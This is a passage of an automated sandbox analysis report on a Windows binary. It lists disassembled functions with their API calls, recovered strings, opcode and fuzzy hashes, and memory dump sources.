                                                                  • Instruction Fuzzy Hash: 0F71F630904209DFCF218FA4CC84AAA7BB5FF49360F24426AFD555A2A9C7318D42FF61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                    • Part of subcall function 00ED2714: GetCursorPos.USER32(?,?,00F977B0,?,00F977B0,00F977B0,?,00F5C5FF,00000000,00000001,?,?,?,00F0BD40,?,?), ref: 00ED2727
                                                                    • Part of subcall function 00ED2714: ScreenToClient.USER32 ref: 00ED2744
                                                                    • Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000001), ref: 00ED2769
                                                                    • Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000002), ref: 00ED2777
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00F5C69C
                                                                  • ImageList_EndDrag.COMCTL32 ref: 00F5C6A2
                                                                  • ReleaseCapture.USER32 ref: 00F5C6A8
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00F5C752
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F5C765
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00F5C847
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 1924731296-2107944366
                                                                  • Opcode ID: d8f5c37b3f4f6c8290fad8ca7e6f0c8226f6e56cd125ba7ff1699bc3673d21a1
                                                                  • Instruction ID: 276a0ccbc7911e04c56924984ee174475843a785b9d9eac80d0333db08b23a84
                                                                  • Opcode Fuzzy Hash: d8f5c37b3f4f6c8290fad8ca7e6f0c8226f6e56cd125ba7ff1699bc3673d21a1
                                                                  • Instruction Fuzzy Hash: 7051B170504308AFDB00EF14CC55F6B7BE1EB84311F10491EF956972E2DB70A949EB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F4211C
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F42148
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F4218A
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F4219F
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F421AC
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F421DC
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00F42223
                                                                    • Part of subcall function 00F42B4F: GetLastError.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B64
                                                                    • Part of subcall function 00F42B4F: SetEvent.KERNEL32(?,?,00F41EE3,00000000,00000000,00000001), ref: 00F42B79
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 2603140658-3916222277
                                                                  • Opcode ID: 954d40e176edbb02f017de96a731c52630b5875e9a244daa4749facbafcf97b1
                                                                  • Instruction ID: 461336b1b628a9d503956a7fb19c5afcf35b5040a5aea591c4f938c1c9293882
                                                                  • Opcode Fuzzy Hash: 954d40e176edbb02f017de96a731c52630b5875e9a244daa4749facbafcf97b1
                                                                  • Instruction Fuzzy Hash: 77417FB1901209BFFB529F50CC85FBB7BACEF48350F504126FE159A141DBB49E44ABA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F60980), ref: 00F49412
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F60980), ref: 00F49446
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F495C0
                                                                  • SysFreeString.OLEAUT32(?), ref: 00F495EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: 656261606dc0ec149fbed7d029d336b95332212097a15e856e3bfa83e1225986
                                                                  • Instruction ID: 608d02f4a7335ccd07c5e6875e1724fcadb40c5f010882961f318fea62689d80
                                                                  • Opcode Fuzzy Hash: 656261606dc0ec149fbed7d029d336b95332212097a15e856e3bfa83e1225986
                                                                  • Instruction Fuzzy Hash: 3AF16071A04209EFCF14DF94C884EAEBBB9FF45314F248498F916AB251CB71AE46DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F4FD9E
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FF31
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FF55
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FF95
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4FFB7
                                                                  • CreateProcessW.KERNEL32 ref: 00F50133
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F50165
                                                                  • CloseHandle.KERNEL32(?), ref: 00F50194
                                                                  • CloseHandle.KERNEL32(?), ref: 00F5020B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: 41850de91eb16cefbb4fa43b4b24db6e57118eda81795493cc0d8dda6059c357
                                                                  • Instruction ID: eee1c88ac8a82a44abf8cb74e1259bf80a33af2f5da5c9a010e1d8db0bf0609b
                                                                  • Opcode Fuzzy Hash: 41850de91eb16cefbb4fa43b4b24db6e57118eda81795493cc0d8dda6059c357
                                                                  • Instruction Fuzzy Hash: 79E1BE716043419FC724EF24C891B6ABBE1EF85320F14896DF9999B3A2CB31DC49DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33B8A,?), ref: 00F34BE0
                                                                    • Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33B8A,?), ref: 00F34BF9
                                                                    • Part of subcall function 00F34FEC: GetFileAttributesW.KERNEL32(?,00F33BFE), ref: 00F34FED
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00F352FB
                                                                  • _wcscmp.LIBCMT ref: 00F35315
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00F35330
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: cee35ca95976d4323aa068fc46afea52d6057041ef96c8a8135bc5b4d48fbb37
                                                                  • Instruction ID: a0f32274707b47677650d4a97fde3fa4e56132a7f3c24e131047ddff5800edbf
                                                                  • Opcode Fuzzy Hash: cee35ca95976d4323aa068fc46afea52d6057041ef96c8a8135bc5b4d48fbb37
                                                                  • Instruction Fuzzy Hash: C95164B24087859BC724DBA0DC819DFB3ECAF84750F50092EF689D3152EF74E6889766
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F58D24
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 091fd74d46cdaf997c4e45c207ebdc1b1a9e71963ed9166a6605f55965c3ea56
                                                                  • Instruction ID: 7ad65864124c679bbbcc820e5b2dca72360b9705650ef41faa6a0dd8678b9a90
                                                                  • Opcode Fuzzy Hash: 091fd74d46cdaf997c4e45c207ebdc1b1a9e71963ed9166a6605f55965c3ea56
                                                                  • Instruction Fuzzy Hash: 26519530A40204BFEF209B64CC89B597BB4EB153A2F244516FF15F61E1CF71A95AFA50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadImageW.USER32 ref: 00F0C638
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0C65A
                                                                  • LoadImageW.USER32 ref: 00F0C672
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F0C690
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F0C6B1
                                                                  • DestroyIcon.USER32(00000000), ref: 00F0C6C0
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F0C6DD
                                                                  • DestroyIcon.USER32(?), ref: 00F0C6EC
                                                                    • Part of subcall function 00F5AAD4: DeleteObject.GDI32(00000000), ref: 00F5AB0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 2819616528-0
                                                                  • Opcode ID: 0802c962a1c945832a868c27964f1b13514ccda75a26c0b3fd01b998bbec9bda
                                                                  • Instruction ID: 9a1da56791061cb4dea8f2b0e4fc47c142f72f7a85f54d2abcbd92438f38df59
                                                                  • Opcode Fuzzy Hash: 0802c962a1c945832a868c27964f1b13514ccda75a26c0b3fd01b998bbec9bda
                                                                  • Instruction Fuzzy Hash: 08517D70A00309AFDB20DF24CC45BAA77B5EB54720F205A1DFA56A72D0DBB1ED51EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F2B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2B54D
                                                                    • Part of subcall function 00F2B52D: GetCurrentThreadId.KERNEL32 ref: 00F2B554
                                                                    • Part of subcall function 00F2B52D: AttachThreadInput.USER32(00000000,?,00F2A23B,?,00000001), ref: 00F2B55B
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2A246
                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F2A263
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F2A266
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2A26F
                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F2A28D
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F2A290
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2A299
                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F2A2B0
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F2A2B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                  • String ID:
                                                                  • API String ID: 2014098862-0
                                                                  • Opcode ID: 0ce746fc57a8247cfb1073ae04567f95f0fd5df32e2e047cb3cdb8226d7e2f6b
                                                                  • Instruction ID: b89e744c5bb4126ced65fdc1cbc46ceabd82eb92f30d8a794ff619f5fe819cee
                                                                  • Opcode Fuzzy Hash: 0ce746fc57a8247cfb1073ae04567f95f0fd5df32e2e047cb3cdb8226d7e2f6b
                                                                  • Instruction Fuzzy Hash: 9111CEB1950218BEF6106B60DC8AF6B3B2DEB4D750F200419F6606B0D1CEF35C50AAA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F2915A,00000B00,?,?), ref: 00F294E2
                                                                  • HeapAlloc.KERNEL32(00000000,?,00F2915A,00000B00,?,?), ref: 00F294E9
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F2915A,00000B00,?,?), ref: 00F294FE
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00F2915A,00000B00,?,?), ref: 00F29506
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00F2915A,00000B00,?,?), ref: 00F29509
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F2915A,00000B00,?,?), ref: 00F29519
                                                                  • GetCurrentProcess.KERNEL32(00F2915A,00000000,?,00F2915A,00000B00,?,?), ref: 00F29521
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00F2915A,00000B00,?,?), ref: 00F29524
                                                                  • CreateThread.KERNEL32 ref: 00F2953E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: d501833e5f694a99c355dfe2545be993808a11b5925e1df14bd5c4095a092fc8
                                                                  • Instruction ID: 04088963406e493538819fa9e14615fe6122a4d33be9726f61b8391e02b068bc
                                                                  • Opcode Fuzzy Hash: d501833e5f694a99c355dfe2545be993808a11b5925e1df14bd5c4095a092fc8
                                                                  • Instruction Fuzzy Hash: 5301CDB5240308BFE710AFA5DC4DF6B7BACEB89711F104411FA15DB1A1CAB19800EB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: b7c17dda5c0ab66cccb5b0b63e41980dc271d64d79b50b8c856db41e7a9bef3c
                                                                  • Instruction ID: b63b13d37ccdaffec5a8a07a85f35359ce33ee211da8d451b3e923de6d561f7a
                                                                  • Opcode Fuzzy Hash: b7c17dda5c0ab66cccb5b0b63e41980dc271d64d79b50b8c856db41e7a9bef3c
                                                                  • Instruction Fuzzy Hash: 24C1AF71E4021A9FDF10DFA8C884AAEBBB5FB48310F148469ED05AB290E770DD44EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 2862541840-625585964
                                                                  • Opcode ID: 82442b50972e0e8463886f947dd48604abd205a6e5d2ad4e5cd490fb52a86493
                                                                  • Instruction ID: 3b2b979d0b41af34df1361a51a62648e6fb75e9d5039314058c0e8bced296a8c
                                                                  • Opcode Fuzzy Hash: 82442b50972e0e8463886f947dd48604abd205a6e5d2ad4e5cd490fb52a86493
                                                                  • Instruction Fuzzy Hash: B7919C71E04219ABDF24CFA5C844FAFBBB8EF85720F10855DF915AB280D7B49900DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F27D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?,?,00F28073), ref: 00F27D45
                                                                    • Part of subcall function 00F27D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D60
                                                                    • Part of subcall function 00F27D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D6E
                                                                    • Part of subcall function 00F27D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?), ref: 00F27D7E
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F49EF0
                                                                  • _memset.LIBCMT ref: 00F49EFD
                                                                  • _memset.LIBCMT ref: 00F4A040
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F4A06C
                                                                  • CoTaskMemFree.OLE32(?), ref: 00F4A077
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 00F4A0C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
                                                                  • Opcode ID: 37cb148d949e86bb51b5021a6986fc168268cdc003500e87e82df4a00eefbd67
                                                                  • Instruction ID: 86e13160d0d620df29faddd684b0b120167c475a66203bdbbd9809ed799c4a4a
                                                                  • Opcode Fuzzy Hash: 37cb148d949e86bb51b5021a6986fc168268cdc003500e87e82df4a00eefbd67
                                                                  • Instruction Fuzzy Hash: 7B912771D0022DABDB20DFA5DC41EDEBBB9EF08310F20415AF915A7291EB719A44DFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F57449
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F5745D
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F57477
                                                                  • _wcscat.LIBCMT ref: 00F574D2
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F574E9
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F57517
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 61ec5c525da21ef966eeee38eaedfd83e9d5f80a4a3da2794b0dd163f0b52b80
                                                                  • Instruction ID: 877db06e7c05c015bd7278f98811d44c97d7cf80ac605f84d5b83bb2a818d8b4
                                                                  • Opcode Fuzzy Hash: 61ec5c525da21ef966eeee38eaedfd83e9d5f80a4a3da2794b0dd163f0b52b80
                                                                  • Instruction Fuzzy Hash: C941A471904348AFDB21EF64DC85FEE77A8EF08361F10442AFA45A7291D7719D88EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F34148: CreateToolhelp32Snapshot.KERNEL32 ref: 00F3416D
                                                                    • Part of subcall function 00F34148: Process32FirstW.KERNEL32(00000000,?), ref: 00F3417B
                                                                    • Part of subcall function 00F34148: CloseHandle.KERNEL32(00000000), ref: 00F34245
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4F08D
                                                                  • GetLastError.KERNEL32 ref: 00F4F0A0
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4F0CF
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4F14C
